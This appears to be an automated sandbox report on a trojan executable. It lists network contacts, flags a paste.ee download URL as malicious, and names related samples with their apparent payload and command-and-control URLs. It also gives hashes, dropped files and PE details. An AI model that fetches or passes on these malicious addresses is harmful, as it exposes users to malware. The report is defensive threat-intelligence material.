https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/7BWJv	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/aws/jsii.git	EwKKdCrEDu.exe, program.js.0.dr	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/aws/jsii	EwKKdCrEDu.exe, program.js.0.dr	false		unknown
http://json-schema.org/draft-07/schema#	program.js.0.dr	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aws.amazon.com	EwKKdCrEDu.exe, program.js.0.dr	false		unknown
https://go.micro	powershell.exe, 00000004.00000002.1687092302.000000000498D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://json-schema.org/schema	EwKKdCrEDu.exe, program.js.0.dr	false		unknown
https://contoso.com/	powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/	powershell.exe, 00000004.00000002.1687092302.00000000048FA000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://github.com/aws/jsii/issues	EwKKdCrEDu.exe, program.js.0.dr	false		unknown
https://github.com/jprichardson/node-fs-extra/issues/269	program.js.0.dr	false		unknown
https://paste.ee	powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#	program.js.0.dr	false		unknown
http://json-schema.org/draft-07/schema	EwKKdCrEDu.exe, program.js.0.dr	false		unknown
http://www.microsoft.coD	powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	paste.ee	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543863
Start date and time:	2024-10-28 15:15:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EwKKdCrEDu.exe renamed because original name is a hash value
Original Sample Name:	2dc8cdf825e23ff1df1ad11b3a6f1973.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@9/7@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 88% Number of executed functions: 17 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target EwKKdCrEDu.exe, PID 6772 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: EwKKdCrEDu.exe

Simulations

Behavior and APIs

Time	Type	Description
10:16:34	API Interceptor	15x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	seethebestthingstobegetmebackwithherlove.hta	Get hash	malicious	Cobalt Strike	Browse	188.114.97.3
	necgoodthingswithgreatthingsentirethingstobeinonline.hta	Get hash	malicious	Cobalt Strike	Browse	188.114.97.3
	BL Packing List & Invoice.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	DHLShippingInvoicesAwbBL000000000102220242247.vbs	Get hash	malicious	Remcos	Browse	188.114.96.3
	20042024150836 14.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Swift Payment 20241014839374.vbs	Get hash	malicious	Remcos	Browse	188.114.96.3
	segura.vbs	Get hash	malicious	AsyncRAT	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	W9f3Fx6sL4.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s553e3fe901654d86bcc4ed44c7c05dd3&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0V1a19QbFZsQVlaTnZNVHRSTWZBWGRNQmtvbDQ2b1NlN1o5MGFiazNzS3lGSlE_ZT1UMnQ4S3Y&wd=target%28Sezione%20senza%20titolo.one%7C8d7e5173-6006-4648-a69d-e39e66e7041a%2FAblehnung%20Rechnung%20R15946098273-KU30_WE02%20Vom%2028%5C%2F%7Cd77916b9-b471-429a-a13e-74764563e56b%2F%29&wdorigin=NavigationUrl	Get hash	malicious	HTMLPhisher	Browse	104.21.79.135
	Okfjk1hs4kdhs2.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Fedex.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Sars Urgent Notice.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lista produkt#U00f3w POL56583753Sarchmentdoc.bat	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3
	XWe8H4gRPb.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	XWe8H4gRPb.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulPki/llllZ:NllUcylll
MD5:	D8D47FD6FA3E199E4AFF68B91F1D04A8
SHA1:	788625E414B030E5174C5BE7262A4C93502C2C21
SHA-256:	2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
SHA-512:	5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmza2ul5.lqi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcp3o5hm.dme.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\bin\jsii-runtime.js

Download File

Process:	C:\Users\user\Desktop\EwKKdCrEDu.exe
File Type:	C++ source, ASCII text, with very long lines (324), with escape sequences
Category:	dropped
Size (bytes):	138639
Entropy (8bit):	4.286369825068587
Encrypted:	false
SSDEEP:	1536:ZMjsdRCCXpnzopj7/5dLopnQPporDa6meL4xmJ:fenLo9QP+lmeL4IJ
MD5:	A7C8367F8B900617374F5D3FAC86DFD7
SHA1:	6BDEAB34FA632083B2578708EB0C50443ED5E9A9
SHA-256:	E4F82DB7579D84B2DDB49B16A8CBD8256D86751473D1A86B4B31D1E3963BA0FA
SHA-512:	2C2E9D5445F4BDFBCA7F35881E9D133373145B40D26ECB9B122E60DD343B580FA3BC70C8B981B4AE7E3D9B8C4EA90C6A77F7328A60CBE0F2515EE364AD0CB0A3
Malicious:	false
Preview:	var __webpack_modules__ = {. 821: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. module = __webpack_require__.nmd(module);. const wrapAnsi16 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${code + offset}m`;. };. const wrapAnsi256 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${38 + offset};5;${code}m`;. };. const wrapAnsi16m = (fn, offset) => (...args) => {. const rgb = fn(...args);. return `.[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;. };. const ansi2ansi = n => n;. const rgb2rgb = (r, g, b) => [ r, g, b ];. const setLazyProperty = (object, property, get) => {. Object.defineProperty(object, property, {. get: () => {. const value = get();. Object.defineProperty(object, property, {.

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\bin\jsii-runtime.js.map

Download File

Process:	C:\Users\user\Desktop\EwKKdCrEDu.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	218125
Entropy (8bit):	5.457704584855637
Encrypted:	false
SSDEEP:	3072:zKHyW445CPl85X3GJXlAnFhvMvOqGPUqdShdY5S8DoDT1JyBwJbMaky9nwe+L/Iq:LWY4KTvqd8dYQ8uJcwSy9nQ
MD5:	0FEFBA04D8BBEDD2CFF7EB75C3834847
SHA1:	054D11200D77C1B5DFB3B98A33973623619D34BE
SHA-256:	DBBDB23093B0732EE1504F79D3835B1C6B2E3F526AB42A6DA381E6CEC2648AE5
SHA-512:	3CEAA01275E2DEC044BA5F8D41092EB4F28E62CDAD24A71C8F7F57E4C48B709568C8C376BF2B048DC989810FB8EB91F2D944379804D5D85480A26663FC3F90FE
Malicious:	false
Preview:	{"version":3,"file":"bin/jsii-runtime.js","mappings":";;;;QAEA,MAAMA,aAAa,CAACC,IAAIC,WAAW,IAAIC;YACtC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAUC,OAAOF;AAAS;QAGlC,MAAMG,cAAc,CAACJ,IAAIC,WAAW,IAAIC;YACvC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAU,KAAKD,YAAYE;AAAO;QAG1C,MAAME,cAAc,CAACL,IAAIC,WAAW,IAAIC;YACvC,MAAMI,MAAMN,MAAME;YAClB,OAAO,KAAU,KAAKD,YAAYK,IAAI,MAAMA,IAAI,MAAMA,IAAI;AAAK;QAGhE,MAAMC,YAAYC,KAAKA;QACvB,MAAMC,UAAU,CAACC,GAAGC,GAAGC,MAAM,EAACF,GAAGC,GAAGC;QAEpC,MAAMC,kBAAkB,CAACC,QAAQC,UAAUC;YAC1CC,OAAOC,eAAeJ,QAAQC,UAAU;gBACvCC,KAAK;oBACJ,MAAMG,QAAQH;oBAEdC,OAAOC,eAAeJ,QAAQC,UAAU;wBACvCI;wBACAC,YAAY;wBACZC,cAAc;;oBAGf,OAAOF;AAAK;gBAEbC,YAAY;gBACZC,cAAc;;AACb;QAIH,IAAIC;QACJ,MAAMC,oBAAoB,CAACC,MAAMC,aAAaC,UAAUC;YACvD,IAAIL,iBAAiBM,WAAW;gBAC/BN,eAAe,oBAAQ;AACxB;YAEA,MAAMrB,SAAS0B,eAAe,KAAK;YACnC,MAAME,SAAS,CAAC;YAEhB,KAAK,OAAOC,aAAaC,UAAUd,OAAOe,QAAQV,eAAe;gBAChE,MAAMW,OAAOH,gBAAgB,WAAW,SAASA;gBACjD,IAAIA,gBAAgBL,aAAa;oBAChCI,OAAOI,QAAQT,KAAKE,UAAUzB;AAC/B,uBAAO,WAAW8B,UAAU,UAAU;oBACrCF,OAAOI,Q

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\lib\program.js

Download File

Process:	C:\Users\user\Desktop\EwKKdCrEDu.exe
File Type:	ASCII text, with very long lines (489)
Category:	dropped
Size (bytes):	802466
Entropy (8bit):	4.298722687837962
Encrypted:	false
SSDEEP:	6144:Z6TjefxOXTNwk8mCkCbCp4wrZaWvZEIhU4FFEY+cbCtNYbIgoxrV2z1J:Z6TjefxOXTNUkCbCp42aW4NwL
MD5:	4C6E1287B2F6060C1E0F386B0B47959A
SHA1:	0FA0C721B6848D78C73FCF74BB37891A17FF0999
SHA-256:	C8DB5A41C7EC02EB2F1F20A6CD544DB215246AD9D566EA9494D63521B9B1E271
SHA-512:	0FF6A037A413BE93DCB3C1B4C26CB9938025F34D9AA20818FBDED5B4B00BC89DCBA9EB58756BAFBA852CA972C058BDDB087E9CB58C9B442AC936C93590E14C13
Malicious:	false
Preview:	var __webpack_modules__ = {. 1165: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. const fs = __webpack_require__(9896);. const path = __webpack_require__(6928);. const LCHOWN = fs.lchown ? "lchown" : "chown";. const LCHOWNSYNC = fs.lchownSync ? "lchownSync" : "chownSync";. const needEISDIRHandled = fs.lchown && !process.version.match(/v1[1-9]+\./) && !process.version.match(/v10\.[6-9]/);. const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const handleEISDIR = needEISDIRHandled ? (path, uid, gid, cb) => er => {.

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\lib\program.js.map

Download File

Process:	C:\Users\user\Desktop\EwKKdCrEDu.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1155588
Entropy (8bit):	5.4159552687244155
Encrypted:	false
SSDEEP:	12288:D2DUMiOfGYFO/1pf0ThVUhI2PoEMuCfzT/2ZoEC74RiCfulDlJ:MZFO/1pf9hI2EjT/2ZoEC74RiCfulDlJ
MD5:	BE06DF1EE810220598CAE6D42AE2FD77
SHA1:	5DD0B0F101FDE69B49E37947380431D75D26125C
SHA-256:	09E18C6FA27068005DA8BCBB802C70B1C182866274478C684A4AB652ACAF2BBD
SHA-512:	BF40F52E37DFDBEE4AC4F562A28520893D3C8C13FDDB7A94E94458B1E8591162EADF3A4BE401A2FF6C2CE2449721F3F036C2B41571BB3C491E7F648595BAA8FA
Malicious:	false
Preview:	{"version":3,"file":"lib/program.js","mappings":";;;QACA,MAAMA,KAAK,oBAAQ;QACnB,MAAMC,OAAO,oBAAQ;QAGrB,MAAMC,SAASF,GAAGG,SAAS,WAAW;QAEtC,MAAMC,aAAaJ,GAAGK,aAAa,eAAe;QAGlD,MAAMC,oBAAoBN,GAAGG,WAC1BI,QAAQC,QAAQC,MAAM,kBACtBF,QAAQC,QAAQC,MAAM;QAEzB,MAAMJ,aAAa,CAACJ,MAAMS,KAAKC;YAC7B;gBACE,OAAOX,GAAGI,YAAYH,MAAMS,KAAKC;AACnC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAME,YAAY,CAACb,MAAMS,KAAKC;YAC5B;gBACE,OAAOX,GAAGc,UAAUb,MAAMS,KAAKC;AACjC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAMG,eACJT,oBAAoB,CAACL,MAAMS,KAAKC,KAAKK,OAAOJ;YAI1C,KAAKA,MAAMA,GAAGC,SAAS,UACrBG,GAAGJ,UAEHZ,GAAGiB,MAAMhB,MAAMS,KAAKC,KAAKK;AAAE,YAE7B,CAACE,GAAGC,IAAIC,KAAKJ,OAAOA;QAGxB,MAAMK,mBACJf,oBAAoB,CAACL,MAAMS,KAAKC;YAC9B;gBACE,OAAON,WAAWJ,MAAMS,KAAKC;AAC/B,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;gBACRE,UAAUb,MAAMS,KAAKC;AACvB;AAAA,YAEA,CAACV,MAAMS,KAAKC,QAAQN,WAAWJ,MAAMS,KAAKC;QAG9C,MAAMW,cAAcf,QAAQC;QAC5B,IAAIe,UAAU,CAACtB,MAAMuB,SAASR,OAAOhB,GAAGuB,QAAQtB,MAAMuB,SAASR;Q

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.486908350674156
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EwKKdCrEDu.exe
File size:	16'803'840 bytes
MD5:	2dc8cdf825e23ff1df1ad11b3a6f1973
SHA1:	82af57e0e6d7cf944148d3a16d7c8ca94fa982f8
SHA256:	5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0
SHA512:	3f20bb95a167d10a2998a63ab0ccd69fe81822d24a39d868d019ac0ff890067c23c015dc0be531d9531be26d6d3f44d7f11c23214ba4778e038b6844f8c8879b
SSDEEP:	98304:dKulY9+o0L82IacWOEF8xbADr/xLCqjqdYCDBvYuSHFCxMg:DZVyj8/tCGiBdSHF7g
TLSH:	F9075A40FD8B40B5DA075871459BA17F27306C098B28DBCBF75C7A68EF332E24A76256
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........J................_.......................@..........................`.......$....@................................

File Icon


Icon Hash:	00d6d9d3e49b13c4

Static PE Info

General

Entrypoint:	0x479610
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	1aae8bf580c846f39c71c05898e57e88

Entrypoint Preview

Instruction
jmp 00007FFA40F09730h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007FFA40EE4756h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007FFA40F0BB84h
cld
call 00007FFA40F0AC1Eh
call 00007FFA40F09859h
add esp, 08h
ret
jmp 00007FFA40F0BA30h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007FFA40F0BA31h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfd8000	0x44c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1034000	0x1ac8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfd9000	0x59074	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf4f6c0	0xb4	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5f93b8	0x5f9400	1f28b8be1e3cede484d9e357668b4fdf	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x5fb000	0x952744	0x952800	d56d6f34cfc5511150be34f251d282b7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xf4e000	0x892a0	0x5f200	9a6b5d4b4f2ec33e3a9321ec1ae7437c	False	0.3812571862680683	data	5.764059911027802	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xfd8000	0x44c	0x600	07832c7a1d0e743908060559ac77cdeb	False	0.359375	OpenPGP Public Key	3.8776437007407005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xfd9000	0x59074	0x59200	416ec19cab761a561c9c632271bf47ad	False	0.5074070827489481	data	6.598814033769377	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x1033000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x1034000	0x1ac8	0x1c00	09c8788bdf8c7a09d4b31f5ed4a27da7	False	0.3466796875	data	3.9915130218731956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1034174	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.33815028901734107
RT_ICON	0x10346dc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.39395306859205775
RT_GROUP_ICON	0x1034f84	0x22	data	English	United States	0.9411764705882353
RT_VERSION	0x1034fa8	0x4f4	data	English	United States	0.2862776025236593
RT_MANIFEST	0x103549c	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL

Import

kernel32.dll

